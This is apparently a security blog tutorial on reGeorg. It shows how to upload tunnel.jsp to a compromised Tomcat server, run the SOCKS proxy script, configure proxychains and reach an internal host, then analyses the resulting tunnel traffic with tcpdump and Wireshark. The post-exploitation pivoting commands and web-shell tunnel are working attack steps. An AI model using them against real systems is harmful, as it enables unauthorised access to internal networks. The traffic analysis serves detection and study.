DOWNDLOAD

Unicorn Network Threat Analyzer

  • Capture network traffic
  • Troubleshoot Wired & Wireless Network
  • Analyze network threats
Read More…
Free Downlaod

How to Use reGeorg for Efficient HTTP Tunneling and Proxy Access to Internal Networks

AndyHuang

Contents hide
Introducing reGeorg
Topology Using reGeorg
Environment: reGeorg
Setup Process
Traffic Analysis
Kali
Server A
Internal Network Server
Summary
Related posts:

Introducing reGeorg

The predecessor of reGeorg is the 2008 extension and expansion of reDuh by SensePost at BlackHat USA 2008.

reGeorg is the successor to reDuh, utilizing the session layer socks5 protocol, offering higher efficiency compared to reDuh.

The function of establishing an HTTP tunnel through reGeorg is evident when we can access Server A from an external network but cannot interact with a host located within the internal network. At this time, reGeorg comes into play. Suppose we have obtained a web shell for Server A, but the internal host’s ICMP, DNS, TCP, and UDP protocols cannot reach the external network, with the only data channel being a web shell acting as a forward proxy.

Therefore, install reGeorg on a server accessible from the public network, and it acts as a relay between the attacker and the internal host, thus enabling information exchange between the attacker and the internal network.

reGeorg download link:

Code Language: JavascriptCopy

git clone https://github.com/sensepost/reGeorg.git

Topology Using reGeorg

reGeorg>

Environment: reGeorg

A VPS acts as the victim service endpoint A with IP: 182.x.x.x. A Docker is deployed on the victim machine, setting up a Tomcat inside it with port 8080 open. Another VPS with IP: 81.x.x.x acts as the attacker, establishing an HTTP tunnel using reGeorg as a tool for setting up the HTTP tunnel.

Setup Process

1. On the victim server’s HTTP server root directory where a shell has been obtained, upload a tunnel.jsp. After uploading,

reGeorg>

test whether it can be accessed.

Code Language: JavascriptCopy

curl http://182.x.x.x:8080/tunnel.jsp

The server returns Georg says, ‘All seems fine’

Server-side configuration complete

2. On the attacker’s machine, download the reGeorg script, running it and setting up a port 3333 to act as the HTTP tunnel port.

Code Language: JavascriptCopy

python reGeorgSocksProxy.py -l 0.0.0.0 -p 3333 -u http://x.x.x.x:8080/tunnel.jsp

3. Open the proxychain settings on the Kali attacker machine, set up the proxy. Configure the proxy to the VPS’s IP and port 3333.

Code Language: JavascriptCopy

vim /etc/proxychains.confAdd a line at the endsocks5 81.x.x.x 3333

Access the internal network server through the proxy on Kali.

Code Language: JavascriptCopy

proxychains curl http://172.17.0.2/login.php

Successfully accessed and completed the setup

Traffic Analysis

Kali

On Kali, capture packets, then access the internal network, using tcpdump to capture packets and analyze traffic.

Code Language: JavascriptCopy

tcpdump -i eth0 -w kali.pcap

Then open Wireshark to trace TCP streams and observe traffic.

Code Language: JavascriptCopy

...............P.........PGET /login.php HTTP/1.1Host: 172.17.0.2User-Agent: curl/7.68.0Accept: */*HTTP/1.1 200 OKDate: Thu, 17 Dec 2020 16:39:09 GMTServer: Apache/2.4.7 (Ubuntu)X-Powered-By: PHP/5.5.9-1ubuntu4.25Set-Cookie: PHPSESSID=7mhcg05sbeerpgjvthqad6r7t6; path=/Expires: Tue, 23 Jun 2009 12:00:00 GMTCache-Control: no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=7mhcg05sbeerpgjvthqad6r7t6; path=/; httponlySet-Cookie: security=impossible; httponlyVary: Accept-EncodingContent-Length: 1567Content-Type: text/html;charset=utf-8

Server A

On server A, when capturing the first stream, it indicates that server A serves as a pivot, showing which internal host and port the server connects to cmd=connect target=172.17.0.2 target internal IP port=80 port is 80

Code Language: JavascriptCopy

POST http://182.x.x.x:8080/tunnel.jsp?cmd=connect&target=172.17.0.2&port=80 HTTP/1.1Host: 182.x.x.x:8080Accept-Encoding: identityContent-Length: 0X-CMD: CONNECTX-PORT: 80X-TARGET: 172.17.0.2User-Agent: python-urllib3/1.26.2HTTP/1.1 200 OKServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=C71AAD9AFD48C0E4796514EF6835F2B4; Path=/; HttpOnlyX-STATUS: OKContent-Type: text/htmlContent-Length: 0Date: Thu, 17 Dec 2020 16:44:45 GMT

The next stream, cmd=read, represents access to the internal content

Accept-Encoding: identity in the request HTTP header announces its content encoding, as long as it’s not explicitly forbidden

The server should not return a 406 Not Acceptable error

The response header: Transfer-Encoding: chunked indicates that it uses chunked transfer encoding

Code Language: JavascriptCopy

POST /tunnel.jsp?cmd=read HTTP/1.1Host: 182.x.x.x:8080Accept-Encoding: identityContent-Length: 0X-CMD: READCookie: JSESSIONID=C71AAD9AFD48C0E4796514EF6835F2B4; Path=/; HttpOnlyConnection: Keep-AliveUser-Agent: python-urllib3/1.26.2HTTP/1.1 200 OKServer: Apache-Coyote/1.1X-STATUS: OKContent-Type: text/htmlTransfer-Encoding: chunkedDate: Thu, 17 Dec 2020 16:44:45 GMT

The following stream is cmd=forward, forwarding to the internal network

Code Language: JavascriptCopy

POST /tunnel.jsp?cmd=forward HTTP/1.1Host: 182.92.73.106:8080Accept-Encoding: identityContent-Length: 83Content-Type: application/octet-streamX-CMD: FORWARDCookie: JSESSIONID=C71AAD9AFD48C0E4796514EF6835F2B4; Path=/; HttpOnlyConnection: Keep-AliveUser-Agent: python-urllib3/1.26.2GET /login.php HTTP/1.1Host: 172.17.0.2User-Agent: curl/7.68.0Accept: */*HTTP/1.1 200 OKServer: Apache-Coyote/1.1X-STATUS: OKContent-Type: text/htmlContent-Length: 0Date: Thu, 17 Dec 2020 16:44:45 GMT

Finally, it’s cmd=disconnect which closes the connection

Code Language: JavascriptCopy

POST /tunnel.jsp?cmd=disconnect HTTP/1.1Host: 182.x.x.x:8080Accept-Encoding: identityX-CMD: DISCONNECTCookie: JSESSIONID=C71AAD9AFD48C0E4796514EF6835F2B4; Path=/; HttpOnlyUser-Agent: python-urllib3/1.26.2HTTP/1.1 200 OKServer: Apache-Coyote/1.1X-STATUS: OKContent-Type: text/htmlContent-Length: 0Date: Thu, 17 Dec 2020 16:44:45 GMT

Internal Network Server

On the internal network server, capture packets and see that Server A requested login.php from the internal network.

Code Language: JavascriptCopy

GET /login.php HTTP/1.1Host: 172.17.0.2User-Agent: curl/7.68.0Accept: */*HTTP/1.1 200 OKDate: Thu, 17 Dec 2020 16:53:17 GMTServer: Apache/2.4.7 (Ubuntu)X-Powered-By: PHP/5.5.9-1ubuntu4.25Set-Cookie: PHPSESSID=65ehap87lgj2sk84poopt0aep3; path=/Expires: Tue, 23 Jun 2009 12:00:00 GMTCache-Control: no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=65ehap87lgj2sk84poopt0aep3; path=/; httponlySet-Cookie: security=impossible; httponlyVary: Accept-EncodingContent-Length: 1567Content-Type: text/html;charset=utf-8

Summary

Through the process of analyzing traffic from setting up the entire HTTP tunnel, we can see that initially it connects to a specified internal IP and port through tunnel.jsp. Then it reads, announces its content encoding as identity, uses chunked transfer, and finally closes the connection with disconnect.

Related posts:

  1. James Server Security Analysis: Host and Port Discovery, Vulnerability Assessment
  2. LC5 Activation Success Tutorial: FTP Server Setup and Password Security Techniques
  3. Leveraging POST Method for SQL Injection: A Step-by-Step Guide
  4. Public WiFi Security: Understanding and Mitigating ARP Spoofing Risks